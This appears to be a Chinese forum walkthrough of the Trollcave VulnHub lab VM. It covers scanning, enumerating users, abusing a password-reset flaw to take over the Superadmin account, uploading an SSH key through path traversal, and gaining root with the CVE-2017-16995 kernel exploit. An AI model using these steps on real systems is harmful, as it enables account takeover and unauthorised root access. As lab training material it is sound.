论坛
潜水/灌水快乐,沉淀知识,认识更多同行。
ToB圈子
加入IT圈,遇到更多同好之人。
朋友圈
看朋友圈动态,了解ToB世界。
ToB门户
了解全球最新的ToB事件
博客
Blog
排行榜
Ranklist
文库
业界最专业的IT文库,上传资料也可以赚钱
下载
分享
Share
导读
Guide
相册
Album
记录
Doing
搜索
本版
文章
帖子
ToB圈子
用户
免费入驻
产品入驻
解决方案入驻
公司入驻
案例入驻
登录
·
注册
只需一步,快速开始
账号登录
立即注册
找回密码
用户名
Email
自动登录
找回密码
密码
登录
立即注册
首页
找靠谱产品
找解决方案
找靠谱公司
找案例
找对的人
专家智库
悬赏任务
圈子
SAAS
ToB企服应用市场:ToB评测及商务社交产业平台
»
论坛
›
安全
›
网络安全
›
Trollcave
Trollcave
自由的羽毛
金牌会员
|
2024-5-16 03:27:28
|
显示全部楼层
|
阅读模式
楼主
主题
918
|
帖子
918
|
积分
2754
一、环境搭建
靶机地址:https://www.vulnhub.com/entry/trollcave-12,230/
使用virtualbox导入,网络改成桥接模式,然后取消启用USB设备,不要更改原来的系统设置
只需要读取靶机下的root/flag.txt
二、信息收集
主机发现:
1 netdiscover -r 192.168.248.0/24
复制代码
端口扫描:
1 nmap -sV 192.168.248.155
复制代码
目录扫描:
1 gobuster dir -u http://192.168.248.155/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
复制代码
三、漏洞发现
尝试访问 /login
在登陆界面,发现了最新的用户以及在线用户,点击用户可以发现URL中末了多了一个数字,多次尝试发现最新的用户是17,那么可以遍历1~17,得到所有用户的信息
1 King:Superadmin
2 dave:Admin
3 dragon:Admin
4 coderguy:Admin
5 cooldude89:Moderator
6 Sir:Moderator
7 Q:Moderator
8 teflon:Moderator
9 TheDankMan:Regular member
10 artemus:Regular member
11 MrPotatoHead:Regular member
12 Ian:Regular member
13 kev:Member
14 notanother:Member
15 anybodyhome:Member
16 onlyme:Member
17 xer:Member
复制代码
可以得到有一个Superadmin用户,检察文章
举行翻译可以得知源码为rails,在github举行搜索
四、漏洞利用
查询找到资料https://github.com/rails/rails
安装的时候会创建用户 rails,网站里还有一个重置密码的功能
http://192.168.248.155/password_resets/new
直接选择重置king用户会报错,选择重置xer用户会得到如下链接
http://192.168.248.155/password_resets/edit.L6P6SLUowyqNQ5BgbJnpBQ?name=xer
访问这个链接即可重置xer的密码
但是通过逻辑错误修改链接即可重置King用户的密码
http://192.168.248.155/password_resets/edit.L6P6SLUowyqNQ5BgbJnpBQ?name=King
登录后在file manager上传文件时,发现不能上传,但是在admin panel中可以开启上传
上传php 但是网站不能解释 php 文件,但是发现文件可以上传到其他目录。因此可以试试 rails 用户是否存在假如存在可以上传 authorized_keys 到 rails 用户下的.ssh 就可以免密码登录 ssh
首老师成ssh秘钥
1 ssh-keygen -f rails
2 mv rails.pub authorized_keys
复制代码
将 authorized_keys 上传到/home/rails/.ssh/,故上传路径为../../../../../../../home/rails/.ssh/authorized_keys
然后举行ssh登录
1 mv rails id_rsa-rails
2 chmod 600 id_rsa-rails
3 ssh -i id_rsa-rails rails@192.168.248.155
复制代码
检察系统信息
CVE-2017-16995提权
https://www.exploit-db.com/exploits/45010
gcc 举行本地编译
1 gcc cve-2017-16995.c -o cve
复制代码
kali开启web服务器举行上传
1 python3 -m http.server 80
复制代码
在靶机上举行下载
然后给于权限并执行文件
1 chmod 777 cve
2 ./cve
复制代码
已经成功提取到root,获取flag.txt
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
本帖子中包含更多资源
您需要
登录
才可以下载或查看,没有账号?
立即注册
x
回复
使用道具
举报
0 个回复
倒序浏览
返回列表
快速回复
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
or
立即注册
本版积分规则
发表回复
回帖并转播
回帖后跳转到最后一页
发新帖
回复
自由的羽毛
金牌会员
这个人很懒什么都没写!
楼主热帖
JDBC p2 JDBC API
【MySQL】MySQL的安装、卸载、配置、登 ...
Vue使用ajax(axios)请求后台数据 ...
.MD语法入门,教你写好readme文档 ...
线程本地存储 ThreadLocal
iOS 组件化及二进制化的探索 ...
【python】标准库(第四讲)
go学习笔记(一)
MongoDB学习笔记:配置文件
Linux【实操篇】—— Shell函数、Shell ...
标签云
存储
挺好的
服务器
快速回复
返回顶部
返回列表